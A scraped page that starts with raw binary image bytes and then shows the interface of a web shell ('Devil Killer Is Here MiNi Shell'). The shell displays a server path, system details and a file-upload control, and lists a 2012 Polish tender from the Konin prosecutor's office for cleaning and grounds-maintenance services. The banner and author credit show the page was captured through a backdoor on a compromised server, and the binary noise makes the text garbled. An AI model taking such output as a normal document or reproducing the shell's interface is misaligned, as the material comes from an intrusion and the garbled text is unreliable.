JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120125/23842-N-2012.html

<p class="kh_header"><b>Konin: Usługi sprzątania pomieszczeń wewnętrznych i terenów zewnętrznych prokuratur okręgu konińskiego</b><br>
<b>Numer ogłoszenia: 23842 - 2012; data zamieszczenia: 25.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Koninie , ul. Kard. St. Wyszyńskiego 1, 62-510 Konin, woj. wielkopolskie, tel. 063 2437510, faks 063 2437611.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi sprzątania pomieszczeń wewnętrznych i terenów zewnętrznych prokuratur okręgu konińskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa sprzątania pomieszczeń wewnętrznych: 
a)Prokuratury Okręgowej w Koninie, 62-510 Konin, ul. Kard. S. Wyszyńskiego 1,
b)Prokuratury Rejonowej w Koninie, 62-510 Konin, ul. Zakładowa 7,
c)Prokuratury Rejonowej w Turku, 62-700 Turek, ul. Legionów Polskich 10,
d)Prokuratury Rejonowej w Kole, 62-600 Koło, ul. Sienkiewicza 21/23,
e)Prokuratury Rejonowej w Słupcy, 62-400 Słupca, ul. Poznańska 14.i terenów zewnętrznych:
a)Prokuratury Okręgowej w Koninie 
b)Prokuratury Rejonowej w Koninie
c)Prokuratury Rejonowej w Turku
d)Prokuratury Rejonowej w Słupcy    

Powierzchnia sprzątania:
Prokuratura Okręgowa w Koninie:
Powierzchnia pomieszczeń wewnętrznych - 1.112,00 m2
dywany, wykładziny dywanowe                     20,92 m2
okna                                                         191,08 m2
tarket                                                       608,36 m2
terakota                                                    508,13 m2
glazura                                                     151,80 m2
panele podłogowe, deski                              63,02 m2
miski ustępowe                                               10 szt.
umywalki                                                        15 szt.
pisuary                                                            4 szt.
dozowniki do mydła w płynie                            10 szt.  
podajniki na papier toaletowy                           10 szt.
podajniki na ręczniki składane                            6 szt.
powierzchnie szklana przy drzwiach balustrady  69,00 m2
płyty meblowe                                             16,85 m2
Powierzchnia terenów utwardzonych - 284,00
Powierzchnia terenów zielonych - 196,00
Prokuratura Rejonowa w Koninie:
Powierzchnia pomieszczeń wewnętrznych - 1443,87
okna                                                         526,00 m2
miski ustępowe                                               13 szt.
umywalki                                                        13 szt.
dozowniki do mydła w płynie                            11 szt.  
podajniki na papier toaletowy                           13 szt.
podajniki na papier toaletowy                           13 szt.
podajniki na ręczniki składane                          11 szt.
podajniki na ręczniki składane                          11 szt.
panele                                                     790,30 m2
panele                                                     790,30 m2
terakota                                                   440,18 m2
płytka ścienna                                           300,00 m2
Powierzchnia terenów utwardzonych - 300,00
Prokuratura Rejonowa w Kole:
Powierzchnia pomieszczeń wewnętrznych - 260,60
dywany, wykładziny dywanowe                     12,80 m2
okna                                                           61,00 m2
terakota                                                      86,00 m2
glazura                                                       46,70 m2
panele podłogowe, deski                              45,60 m2
miski ustępowe                                                 2 szt.
umywalki                                                         1 szt.
dozowniki do mydła w płynie                              1 szt.
podajniki na papier toaletowy                             2 szt.
podajniki na ręczniki składane                            1 szt.
wykładziny PCV                                         152,90 m2
lastriko                                                       30,00 m2
powierzchnia szklana przy drzwiach               16,00 m2
gemalit                                                     180,00 m2
Prokuratura Rejonowa w Turku:
Powierzchnia pomieszczeń wewnętrznych - 456,00
terakota                                                    259,18 m2
okna                                                           64,36 m2
glazura                                                       78,00 m2
parkiet, deski                                            237,71 m2
miski ustępowe                                                 6 szt.
umywalki                                                         5 szt.
pisuary                                                            2 szt.
dozowniki do mydła w płynie                              5 szt.  
podajniki na papier toaletowy                             6 szt.
podajniki na ręczniki składane                            4 szt.
powierzchnie szklana przy drzwiach luksfery        2,50 m2
Powierzchnia terenów utwardzonych - 300,00
Powierzchnia terenów zielonych - 142,80
Prokuratura Rejonowa w Słupcy:
Powierzchnia pomieszczeń wewnętrznych - 500,61
okna                                                           46,77 m2
terakota, gres                                              80,23 m2
glazura                                                       51,14 m2
panele podłogowe, deski                             172,74 m2
miski ustępowe                                                 3 szt.
umywalki, zlewozmywaki                                   5 szt.
dozowniki do mydła w płynie                              3 szt.  
podajniki na papier toaletowy                             3 szt.
podajniki na ręczniki składane                            3 szt.
lastriko                                                       33,78 m2
powierzchnia szklana przy drzwiach luksfery   37,12 m2
posadzka                                                    57,13 m2
kabina                                                             1 szt.
lustra                                                               3 szt.
kostka brukowa                                           10,14 m2
wykładziny PCV                                         113,67 m2
Powierzchnia terenów utwardzonych - 363,69
Powierzchnia terenów zielonych - 175,89

Częstotliwość sprzątania:
Prokuratura Okręgowa w Koninie:
Pow. biurowa 571,53 m2 - 5 razy w tygodniu
Pow. korytarzy i klatek schodowych 182,72 m2 - 5 razy w tygodniu   
Pow. WC i łazienek 54,71 m2- 5 razy w tygodniu
Pow. kuchni 16,80 m2 - 5 razy w tygodniu                                                  
Pow. pomieszczeń socjalnych 77,85 m2 - 5 razy w tygodniu         
Pomieszczenia ograniczonego dostępu (archiwum, kancelaria tajna, serwerownia)  140,87 m2 - archiwum raz na kwartał pozostałe raz w miesiącu Uwaga ! pomieszczenie będą sprzątane tylko w obecności pracownika prokuratury).
Pomieszczenia pomocnicze 67,52 m2 (pomieszczenia gospodarcze, magazyny)  (raz na kwartał)
Prokuratura Rejonowa  w Koninie
Pow. biurowa 692,52 m2 pięć razy w tygodniu
Pow. korytarzy i klatek schodowych 361,29 m2  pięć razy w tygodniu
Pow. WC i łazienek 55,16 m2 pięć razy w tygodniu
Pow. kuchni 36,44 m2 pięć razy w tygodniu
Pow. pomieszczeń socjalnych 28,23 m2 pięć razy w tygodniu
Pomieszczenia ograniczonego dostępu (archiwum, kancelaria tajna, serwerownia) 173,69 m2  archiwum raz na kwartał pozostałe raz w miesiąc Uwaga ! pomieszczenie będą sprzątane tylko w obecności pracownika prokuratury.
Pomieszczenia pomocnicze 
(pomieszczenia gospodarcze, magazyny) 96,54 m2 raz na kwartał        
Prokuratura Rejonowa  w Kole
Pow. biurowa  133,65m2 pięć razy w tygodniu
Pow. korytarzy i klatek schodowych 52,95 m2    pięć razy w tygodniu
Pow. WC i łazienek 10,20 m2 pięć razy w tygodniu
Pow. kuchni 13,90 m2 pięć razy w tygodniu
Pomieszczenia ograniczonego dostępu (archiwum) i serwerowni 13,90 m2 archiwum raz na kwartał pozostałe raz w miesiącu Uwaga ! pomieszczenie będą sprzątane tylko w obecności pracownika prokuratury
Pomieszczenia pomocnicze (pomieszczenia gospodarcze, magazyny) 36,00 m2 raz na kwartał
Prokuratura Rejonowa w Turku    
Pow. biurowa    221,57 m2 pięć razy w tygodniu
Pow. korytarzy i klatek schodowych 82,65 m2   pięć razy w tygodniu
Pow. WC i łazienek  23,94 m2  pięć razy w tygodniu                                       
Pow. kuchni  8,71 m2 pięć razy w tygodniu
Pow. salki konferencyjnej  36,81 m2 raz na kwartał        
Pomieszczenia pomocnicze (pomieszczenia gospodarcze, magazyny, garaż)  26,63 m2      
Pomieszczenia ograniczonego dostępu (archiwum, kancelaria tajna, serwerownia) 55,69 m2 archiwum raz na kwartał pozostałe raz w miesiącu Uwaga ! pomieszczenie będą sprzątane tylko w obecności pracownika prokuratury.
Prokuratura Rejonowa w Słupcy
Pow. biurowa  219,30 m2  pięć razy w tygodniu                                                  
Pow. korytarzy i klatek schodowych 77,04 m2  pięć razy w tygodniu                            
Pow. WC i łazienek 12,20 m2  pięć razy w tygodniu                                            
Pow. kuchni 23,94 m2 pięć razy w tygodniu
Pomieszczenia ograniczonego dostępu (archiwum, kancelaria tajna, serwerownia) 64,97 m2 archiwum raz na kwartał pozostałe raz w miesiącu Uwaga ! pomieszczenie będą sprzątane tylko w obecności pracownika prokuratury       
Pomieszczenia pomocnicze (pomieszczenia gospodarcze, magazyny, garaż, piwniczne  korytarze  ) 103,16 m2  raz na kwartał                                                                                                                       
2. W zakres usługi sprzątania pomieszczeń wewnętrznych w/w jednostkach wchodzi:
-utrzymywanie czystości we wszystkich pomieszczeniach,
-zamiatanie, zmywanie, pastowanie i froterowanie powierzchni podłóg,
-odkurzanie wykładzin dywanowych, z tworzyw sztucznych, dywanów, chodników i mebli tapicerowanych,
-wycieranie z kurzu wszystkich mebli, parapetów, lamp, kontaktów prądu, wyłączników oświetlenia, gniazd komputerowych, likwidowanie pajęczyn,
-wyrzucenie śmieci z koszy i pojemników do tego przystosowanych oraz ich wykładanie workami foliowymi,  
-mycie zlewozmywaków lub podobnych urządzeń do tego przystosowanych,
-wycieranie drzwi i płytek naściennych i ich gruntowne mycie,
-utrzymywanie w czystości WC - w tym mycie ich całego wyposażenia.
3.	Sprzątanie terenów zewnętrznych obejmuje:
a) Prace porządkowe:
- zamiatanie chodników, schodów i parkingów, (codziennie) 
- mycie schodów (w razie potrzeby), 
- wyrzucanie śmieci z koszy (codziennie),
- zbieranie śmieci oraz niedopałków (codziennie),
- usuwanie plam bądź innych zanieczyszczeń (w razie potrzeby) ,
- zamiatanie liści (w razie potrzeby) ,
- składowanie liści oraz ich wywóz  (w razie potrzeby) ,
- odśnieżanie schodów, chodników, parkingów (w razie potrzeby) ,
- wywóz śniegu (w razie potrzeby) ,
- posypywanie solą lub piaskiem śliskich i zmrożonych nawierzchni (w razie  
  potrzeby),
- usuwanie oblodzeń (w razie potrzeby),
b) Prace konserwacyjne terenów zielonych obejmują: 
	- grabienie i koszenie trawników,
	- urządzanie i pielęgnacja zieleńców, 
	- przycinanie i formowanie roślin, 
	- nawożenie ziemi,
	- sadzenie roślin,
	- pielenie klombów i zieleńców, 
	- opryskiwanie krzewów i kwiatów.
4. Usługi winny być świadczone w sposób i częstotliwością określoną w załączniku nr 1- harmonogram wykonywania robót do projektu umowy, w dniach roboczych od poniedziałku do piątku, średnio 21 dni w miesiącu, również w trakcie wykonywanych remontów obejmujących: biura, korytarze, toalety, klatki schodowe, pomieszczenia magazynowe, łazienki, hole.
Czas sprzątania uzgodniony zostanie w formie pisemnej z kierownikami jednostek wymienionych w § 3 pkt 1.
5. Usługa sprzątania świadczona będzie przy zastosowaniu profesjonalnych środków czystości oraz profesjonalnego sprzętu.
6. Wykonawca gwarantuje, iż materiały i środki czystości, które będą wykorzystywane do wykonywania powyższych usług są dopuszczone do stosowania zgodnie z przepisami prawa i będą stosowane zgodnie z przeznaczeniem i zaleceniami producenta. Zamawiający w każdej chwili trwania umowy będzie mógł zażądać od Wykonawcy okazania używanych środków chemicznych i sprawdzenia posiadanych atestów.
7. Wykonawca jest zobowiązany do pokrycia kosztów wynikających z zakupu środków czyszczących, dezynfekujących, pielęgnacyjnych, zapachowych, worków na śmieci, zawieszek do WC, mydła w płynie, papieru toaletowego (dwuwarstwowy, gramatura min. 30g/m2, białość min. 70%, rola o średnicy 19 cm, średnica tulei 6 cm, szerokość 10 cm, długość do 160 m, ) i ręczników papierowych(składane w Z w kolorze zielonym lub szarym o wymiarach 25x23 cm).
Ilość osób korzystających z pomieszczeń sanitarnych:
	- Prokuratura Okręgowa w Koninie - 45 osób,
	- Prokuratura Rejonowa w Koninie - 27 osób,
	- Prokuratura Rejonowa w Kole - 14 osób,
	- Prokuratura Rejonowa w Turku - 13 osób,
	- Prokuratura Rejonowa w Słupcy - 10 osób.
8. Przy pracach związanych z pielęgnacją terenów zielonych Wykonawca zobowiązany będzie do stosowania własnych środków ochrony i pielęgnacji roślin. W przypadku dosadzania roślin Zamawiający zakupuje je we własnym zakresie i na swój koszt.  
9. Wykonawca sam wyznacza osoby odpowiedzialne za wykonywanie usług sprzątania, co udokumentuje przez złożenie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia w poszczególnych jednostkach. Wykaz osób Wykonawca przekaże Zamawiającemu po podpisaniu umowy.
10. Zmiana pracownika będzie możliwa w następującej sytuacji:
- na żądanie Zamawiającego w przypadku nienależytego wykonywania powierzonych prac,
- na wniosek Wykonawcy, uzasadniony obiektywnymi okolicznościami, po przedstawieniu i zaakceptowaniu przez Zamawiającego kandydatury innej osoby. 
11.Zamawiajacy dopuszcza możliwość przeprowadzenia wizji lokalnej w ww obiektach Prokuratur, po uprzednim telefonicznym ustaleniu terminu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał lub wykonuje co najmniej 2 usługi sprzątania, z których każda trwała co najmniej 12 miesięcy w ramach jednego kontraktu, każda realizowana na obiektach biurowych o powierzchni przekraczającej 500 m2 oraz załączenie dokumentów potwierdzających, że usługi zostały wykonane należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Ofertę sporządzoną wg wzoru stanowiącego załącznik nr 5 do Siwz- formularz ofertowy
b)Oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp zgodnie zgodne z treścią załącznika nr 4 do Siwz (w stosunku do osób fizycznych).
c)Pełnomocnictwo w formie pisemnej. Z treści pełnomocnictwa musi wynikać: a. czy ustanowiony Pełnomocnik jest uprawniony do reprezentowania Wykonawcy/ów w postępowaniu o udzielenie zamówienia publicznego i do zawarcia umowy. b. że dotyczy niniejszego postępowania o udzielenie zamówienia publicznego. Jego treść powinna także identyfikować Wykonawców ubiegających się wspólnie o udzielenie zamówienia, jak również wskazywać ustanowionego pełnomocnika. Pełnomocnictwo powinno być podpisane przez osoby uprawnione do składania oświadczeń woli w imieniu Wykonawcy. Pełnomocnictwo powinno być złożone w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Każda ze stron może żądać wprowadzenia zmian w umowie w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadku zmiany stawki podatku VAT. Wynagrodzenie wskazane w umowie wyrażone będzie w wartości brutto, może ono ulec zmianie w przypadku zmiany stawki VAT w czasie trwania umowy lecz nie więcej niż o kwotę podatku wynikającą ze zmiany obowiązującej stawki VAT. 
 Inicjatorem zmian może być Zamawiający lub Wykonawca poprzez pisemne wystąpienie w okresie obowiązywania umowy zawierające opis proponowanych zmian, ich uzasadnienie oraz termin wprowadzenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.konin.po.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Koninie, ul. Kard. Stefana Wyszyńskiego 1, 62-510 Konin, pokój 108..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2012 godzina 10:00, miejsce: Prokuratura Okręgowa w Koninie, ul. Kard. Stefana Wyszyńskiego 1, 62-510 Konin, pokój 108..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com